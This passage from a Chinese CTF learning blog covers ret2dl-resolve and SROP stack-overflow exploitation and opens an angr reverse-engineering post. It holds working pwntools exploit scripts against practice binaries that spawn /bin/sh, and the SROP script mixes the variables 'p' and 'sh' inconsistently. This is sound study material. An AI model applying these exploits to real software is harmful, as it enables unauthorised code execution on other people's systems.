class="line">payload2 += <span class="string">'aaaa'</span></span><br><span class="line">payload2 += fake_reloc <span class="comment"># (base_stage+28)的位置</span></span><br><span class="line">payload2 += <span class="string">'B'</span> * align</span><br><span class="line">payload2 += fake_sym <span class="comment"># (base_stage+36)的位置</span></span><br><span class="line">payload2 += <span class="string">"system\x00"</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="模板"><a href="#模板" class="headerlink" title="模板"></a>模板</h2><p>这里使用到了roputils</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> roputils <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> process</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> gdb</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> context</span><br><span class="line">r = process(<span class="string">'./pwn200'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">rop = ROP(<span class="string">'./pwn200'</span>)</span><br><span class="line">offset = <span class="number">112</span></span><br><span class="line">bss_base = rop.section(<span class="string">'.bss'</span>)</span><br><span class="line">buf = rop.fill(offset)</span><br><span class="line"></span><br><span class="line">buf += rop.call(<span class="string">'read'</span>, <span class="number">0</span>, bss_base, <span class="number">100</span>) <span class="comment">#返回地址处自动加上了有ppp_ret的地址</span></span><br><span class="line"><span class="comment">## used to call dl_Resolve()</span></span><br><span class="line">buf += rop.dl_resolve_call(bss_base + <span class="number">20</span>, bss_base) <span class="comment"># dl_resolve_call第一个参数是Elf32_Rel的base，用来填上fake Rel结构体偏移的 第二个是*args，执行dl_resolve_call时函数的参数</span></span><br><span class="line">r.send(buf)</span><br><span class="line"></span><br><span class="line">buf = rop.string(<span class="string">'/bin/sh'</span>) <span class="comment"># /bin/sh是system参数</span></span><br><span class="line">buf += rop.fill(<span class="number">20</span>, buf)</span><br><span class="line"><span class="comment">## used to make faking data, such relocation, Symbol, Str</span></span><br><span class="line">buf += rop.dl_resolve_data(bss_base + <span class="number">20</span>, <span class="string">'system'</span>) <span class="comment"># 这里同时填上了Elf32_Rel结构体和Elf32_sym结构体（base+20对应前面的base+20，注意）</span></span><br><span class="line">buf += rop.fill(<span class="number">100</span>, buf)</span><br><span class="line">r.send(buf)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>不过在布置base的时候需要注意一下bss的内容还有一些对齐操作，必要时调试观察+修改一下base</p>
<hr>
<p>参考链接：</p>
<blockquote>
<p><a href="https://bbs.pediy.com/thread-227034.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-227034.htm</a></p>
<p><a href="https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/</a></p>
<p>64位参考链接：<a href="https://xz.aliyun.com/t/5722#toc-2" target="_blank" rel="noopener">https://xz.aliyun.com/t/5722#toc-2</a></p>
</blockquote>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/06/%E9%AB%98%E7%BA%A7%E6%A0%88%E6%BA%A2%E5%87%BA%E2%80%94%E2%80%94SROP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/04/06/%E9%AB%98%E7%BA%A7%E6%A0%88%E6%BA%A2%E5%87%BA%E2%80%94%E2%80%94SROP/" class="post-title-link" itemprop="url">高级栈溢出——SROP</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-04-06 06:15:48 / Modified: 21:16:29" itemprop="dateCreated datePublished" datetime="2020-04-06T06:15:48+08:00">2020-04-06</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/04/06/%E9%AB%98%E7%BA%A7%E6%A0%88%E6%BA%A2%E5%87%BA%E2%80%94%E2%80%94SROP/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/04/06/%E9%AB%98%E7%BA%A7%E6%A0%88%E6%BA%A2%E5%87%BA%E2%80%94%E2%80%94SROP/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="高级栈溢出——SROP"><a href="#高级栈溢出——SROP" class="headerlink" title="高级栈溢出——SROP"></a>高级栈溢出——SROP</h1><p>查漏补缺233333</p>
<h1 id="SROP"><a href="#SROP" class="headerlink" title="SROP"></a>SROP</h1><p>Sigreturn Oriented Programming</p>
<p>其中Unix-like system处理信号量的机制主要步骤分为如下：</p>
<blockquote>
<p>当内核向某个进程发起（deliver）一个signal，该进程会被暂时挂起（suspend），进入内核（1）<br>然后内核为该进程保存相应的上下文，跳转到之前注册好的signal handler中处理相应signal（2）<br>当signal handler返回之后（3）<br>内核为该进程恢复之前保存的上下文，最后恢复进程的执行（4）</p>
</blockquote>
<h2 id="ucontext"><a href="#ucontext" class="headerlink" title="ucontext"></a>ucontext</h2><p>伪造时需要注意：esp，ebp和es，gs等段寄存器不可直接设置为0</p>
<p>保存上下文时保存的内容叫<code>ucontext</code>，具体对应如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">sigcontext</span>	//<span class="title">x86</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">unsigned</span> short gs, __gsh;</span><br><span class="line">  <span class="keyword">unsigned</span> short fs, __fsh;</span><br><span class="line">  <span class="keyword">unsigned</span> short es, __esh;</span><br><span class="line">  <span class="keyword">unsigned</span> short ds, __dsh;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> edi;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> esi;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> ebp;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> esp;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> ebx;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> edx;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> ecx;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> eax;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> trapno;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> err;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> eip;</span><br><span class="line">  <span class="keyword">unsigned</span> short cs, __csh;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> eflags;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> esp_at_signal;</span><br><span class="line">  <span class="keyword">unsigned</span> short ss, __ssh;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">fpstate</span> * <span class="title">fpstate</span>;</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> oldmask;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">long</span> cr2;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">////////////////////////////////////////////////</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">fpstate</span> //<span class="title">x64</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="comment">/* FPU environment matching the 64-bit FXSAVE layout.  */</span></span><br><span class="line">  <span class="keyword">__uint16_t</span>        cwd;</span><br><span class="line">  <span class="keyword">__uint16_t</span>        swd;</span><br><span class="line">  <span class="keyword">__uint16_t</span>        ftw;</span><br><span class="line">  <span class="keyword">__uint16_t</span>        fop;</span><br><span class="line">  <span class="keyword">__uint64_t</span>        rip;</span><br><span class="line">  <span class="keyword">__uint64_t</span>        rdp;</span><br><span class="line">  <span class="keyword">__uint32_t</span>        mxcsr;</span><br><span class="line">  <span class="keyword">__uint32_t</span>        mxcr_mask;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">fpxreg</span>    _<span class="title">st</span>[8];</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">xmmreg</span>    _<span class="title">xmm</span>[16];</span></span><br><span class="line">  <span class="keyword">__uint32_t</span>        padding[<span class="number">24</span>];</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">sigcontext</span> </span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">__uint64_t</span> r8;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r9;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r10;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r11;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r12;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r13;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r14;</span><br><span class="line">  <span class="keyword">__uint64_t</span> r15;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rdi;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rsi;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rbp;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rbx;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rdx;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rax;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rcx;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rsp;</span><br><span class="line">  <span class="keyword">__uint64_t</span> rip;</span><br><span class="line">  <span class="keyword">__uint64_t</span> eflags;</span><br><span class="line">  <span class="keyword">unsigned</span> short cs;</span><br><span class="line">  <span class="keyword">unsigned</span> short gs;</span><br><span class="line">  <span class="keyword">unsigned</span> short fs;</span><br><span class="line">  <span class="keyword">unsigned</span> short __pad0;</span><br><span class="line">  <span class="keyword">__uint64_t</span> err;</span><br><span class="line">  <span class="keyword">__uint64_t</span> trapno;</span><br><span class="line">  <span class="keyword">__uint64_t</span> oldmask;</span><br><span class="line">  <span class="keyword">__uint64_t</span> cr2;</span><br><span class="line">  __extension__ <span class="keyword">union</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="class"><span class="keyword">struct</span> _<span class="title">fpstate</span> * <span class="title">fpstate</span>;</span></span><br><span class="line">      <span class="keyword">__uint64_t</span> __fpstate_word;</span><br><span class="line">    &#125;;</span><br><span class="line">  <span class="keyword">__uint64_t</span> __reserved1 [<span class="number">8</span>];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h2 id="syscall"><a href="#syscall" class="headerlink" title="syscall"></a>syscall</h2><p>具体利用时需要的是调用sigreturn系统调用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;*for x86*&#x2F;</span><br><span class="line">mov eax,0x77</span><br><span class="line">int 80h</span><br><span class="line">&#x2F;*for x86_64*&#x2F;</span><br><span class="line">mov rax,0xf</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>

<h2 id="利用原理："><a href="#利用原理：" class="headerlink" title="利用原理："></a>利用原理：</h2><ul>
<li>Signal Frame 被保存在用户的地址空间中，所以用户是可以读写的。</li>
<li>由于内核与信号处理程序无关 (kernel agnostic about signal handlers)，它并不会去记录这个 signal 对应的 Signal Frame，所以当执行 sigreturn 系统调用时，此时的 Signal Frame 并不一定是之前内核为用户进程保存的 Signal Frame。</li>
</ul>
<p>比如当我们执行sigreturn系统调用之前栈布局是如下情况的话，当系统执行完 sigreturn 系统调用之后，会执行一系列的 pop 指令以便于恢复相应寄存器的值，当执行到 rip 时，就会将程序执行流指向 syscall 地址，根据相应寄存器的值，此时，便会得到一个 shell</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406192003998.png" alt="image-20200406192003998" style="zoom:67%;">

<h2 id="链式利用原理："><a href="#链式利用原理：" class="headerlink" title="链式利用原理："></a>链式利用原理：</h2><ul>
<li><strong>控制栈指针。</strong></li>
<li><strong>把原来 rip 指向的<code>syscall</code> gadget 换成<code>syscall; ret</code> gadget。</strong></li>
</ul>
<p>如下图所示 ，这样当每次 syscall 返回的时候，栈指针都会指向下一个 Signal Frame。因此就可以执行一系列的 sigreturn 函数调用</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406192224800.png" alt="image-20200406192224800" style="zoom:80%;">

<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><ol>
<li>程序存在栈溢出漏洞</li>
<li>知道栈地址或者可以知道需要使用字符串的地址等</li>
<li>知道sigreturn的地址</li>
<li>知道syscall的地址或者syscall gadget地址</li>
</ol>
<h1 id="smallest"><a href="#smallest" class="headerlink" title="smallest"></a>smallest</h1><p>原理看上去挺好理解，还是直接实操吧</p>
<p><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406194252445.png" alt="image-20200406194252445"></p>
<p>程序没有canary和PIE保护</p>
<p>具体的程序就这么几行汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">xor     rax, rax</span><br><span class="line">mov     edx, 400h       ; count</span><br><span class="line">mov     rsi, rsp        ; buf</span><br><span class="line">mov     rdi, rax        ; fd</span><br><span class="line">syscall                 ; LINUX - sys_read</span><br><span class="line">retn</span><br></pre></td></tr></table></figure>

<p>然后加载进程序的时候只有这么几个寄存器被操作了，其余值均为0（Ubuntu16.04）</p>
<p>直接从rsp处读取了0x400个字节的栈内容，其中最主要还是需要知道怎么来构造出sigreturn的syscall操作</p>
<p>这里通过一个exp来学习一下：</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'smallest'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\x00'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\x00'</span>))</span><br><span class="line">global_max_fast=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line">syscall_ret = <span class="number">0x00000000004000BE</span></span><br><span class="line">start_addr = <span class="number">0x00000000004000B0</span></span><br><span class="line"><span class="comment">## set start addr three times</span></span><br><span class="line">payload = p64(start_addr) * <span class="number">3</span></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">## modify the return addr to start_addr+3</span></span><br><span class="line"><span class="comment">## so that skip the xor rax,rax; After read rax=1</span></span><br><span class="line"><span class="comment">## get stack addr</span></span><br><span class="line">sh.send(<span class="string">'\xb3'</span>) <span class="comment"># 这一步很巧妙，只读了一个字节绕过 xor rax,rax 刚好把rax设置成1用于write leak栈地址</span></span><br><span class="line">stack_addr = u64(sh.recv()[<span class="number">8</span>:<span class="number">16</span>])</span><br><span class="line">log.success(<span class="string">'leak stack addr :'</span> + hex(stack_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">## make the rsp point to stack_addr</span></span><br><span class="line"><span class="comment">## the frame is read(0,stack_addr,0x400)</span></span><br><span class="line">sigframe = SigreturnFrame()</span><br><span class="line">sigframe.rax = constants.SYS_read <span class="comment"># constans直接获取SYS_read的系统调用号，这里为什么要通过sigframe链式利用stack_addr可能是因为这样比较好设置/bin/sh的偏移，直接通过leak到的地址来设置</span></span><br><span class="line">sigframe.rdi = <span class="number">0</span></span><br><span class="line">sigframe.rsi = stack_addr</span><br><span class="line">sigframe.rdx = <span class="number">0x400</span></span><br><span class="line">sigframe.rsp = stack_addr</span><br><span class="line">sigframe.rip = syscall_ret</span><br><span class="line">payload = p64(start_addr) + <span class="string">'a'</span> * <span class="number">8</span> + str(sigframe) <span class="comment">#先设置好sigframe，然后跳到start再读取一次</span></span><br><span class="line">sh.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># set rax=15 and call sigreturn</span></span><br><span class="line">sigreturn = p64(syscall_ret) + <span class="string">'b'</span> * <span class="number">7</span> <span class="comment">#这里相当于把前一步的aaaaaaaa(返回地址处)填充成p64(syscall_ret)，然后把rax设置成0x15，直接调用syscall，就会用到我们的sigframe，这7个b似乎没有影响</span></span><br><span class="line"><span class="comment">#调用完之后会直接按照sigframe执行 read(0,stack_addr,0x400)</span></span><br><span class="line">sh.send(sigreturn) <span class="comment"># 这个时候就会直接往leak的stack_addr处读取0x400个字节，sigframe的长度是0x98</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># call execv("/bin/sh",0,0)</span></span><br><span class="line">sigframe = SigreturnFrame()</span><br><span class="line">sigframe.rax = constants.SYS_execve</span><br><span class="line">sigframe.rdi = stack_addr + <span class="number">0x120</span>  <span class="comment"># "/bin/sh" 's addr</span></span><br><span class="line">sigframe.rsi = <span class="number">0x0</span></span><br><span class="line">sigframe.rdx = <span class="number">0x0</span></span><br><span class="line">sigframe.rsp = stack_addr</span><br><span class="line">sigframe.rip = syscall_ret</span><br><span class="line"></span><br><span class="line">frame_payload = p64(start_addr) + <span class="string">'b'</span> * <span class="number">8</span> + str(sigframe)</span><br><span class="line"><span class="keyword">print</span> len(frame_payload)</span><br><span class="line">payload = frame_payload + (<span class="number">0x120</span> - len(frame_payload)) * <span class="string">'\x00'</span> + <span class="string">'/bin/sh\x00'</span></span><br><span class="line">sh.send(payload)</span><br><span class="line">sh.send(sigreturn)</span><br><span class="line">sh.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<hr>
<blockquote>
<p>参考链接：</p>
<p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#srop" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#srop</a></p>
<p><a href="http://www.reshahar.com/2017/05/04/360春秋杯smallest-pwn的学习与利用/" target="_blank" rel="noopener">http://www.reshahar.com/2017/05/04/360%E6%98%A5%E7%A7%8B%E6%9D%AFsmallest-pwn%E7%9A%84%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%A9%E7%94%A8/</a></p>
<p><a href="https://www.anquanke.com/post/id/85810" target="_blank" rel="noopener">https://www.anquanke.com/post/id/85810</a></p>
<p><a href="https://www.freebuf.com/articles/network/87447.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/network/87447.html</a></p>
</blockquote>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/01/angr%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/04/01/angr%E5%AD%A6%E4%B9%A0/" class="post-title-link" itemprop="url">angr学习</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-04-01 21:58:23" itemprop="dateCreated datePublished" datetime="2020-04-01T21:58:23+08:00">2020-04-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-04-02 13:39:56" itemprop="dateModified" datetime="2020-04-02T13:39:56+08:00">2020-04-02</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/04/01/angr%E5%AD%A6%E4%B9%A0/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/04/01/angr%E5%AD%A6%E4%B9%A0/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="自己学校新生杯一道逆向题引导的angr学习"><a href="#自己学校新生杯一道逆向题引导的angr学习" class="headerlink" title="自己学校新生杯一道逆向题引导的angr学习"></a>自己学校新生杯一道逆向题引导的angr学习</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>上学期在图书馆研究室偶然提到了自己协会办比赛可以给学弟学妹们拿学分的想法，我当时的想法是办可以办，就是题目可能得非常简单他们才能写，嘛不过事实确实是这样。可是有外校师傅一起加入之后就变的很活跃了，室友请了启奡师傅还有福州大学的师傅来出题，自己也在二进制方向放了一波签到题，举行了一次面向大一大二的新生杯，也拉了一些外校的师傅来打，整体办的还是蛮成功的，室友看上去也挺开心，这里专门用启奡师傅给的逆向来记一篇一直没有接触的angr的学习</p>
<h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><p>看来以后写博客得把题目链接也给上了，所以去github新建了一个用来放题目的仓库，<a href="https://github.com/Coldshield/CTF-Challenges/raw/master/ReverseLearning/funnyre" target="_blank" rel="noopener">题目链接</a></p>
<p>拿到题目之后首先用IDA脚本去花指令，这里用的是IDApython</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ads = <span class="number">0x4005B0</span></span><br><span class="line"></span><br><span class="line">end = <span class="number">0x401DC0</span></span><br><span class="line"></span><br><span class="line">codes = get_bytes(ads, end-ads)</span><br><span class="line"></span><br><span class="line">codes = codes.replace(<span class="string">"\x74\x03\x75\x01\xe8\x90"</span>, <span class="string">"\x90\x90\x90\x90\x90\x90"</span>)</span><br><span class="line"></span><br><span class="line">patch_bytes(ads, codes)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"[+] patch ok"</span></span><br></pre></td></tr></table></figure>

<p>得到函数之后可以发现是一个很长的线性执行流程，直接手动把整个流程一步步过肯定很麻烦了，当然要自己写脚本来简化</p>
<p><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1585656430766.png" alt="1585656430766"></p>
<p>出题人wp写的思路是：</p>
<ol>
<li>简单花指令的去除</li>
<li>在有限域上运算的简化</li>
</ol>
<p>ps：在逆向的时候突然发现原来IDA可以按<code>=</code>映射变量，噗，我尼玛玩了这么久的IDA居然才知道</p>
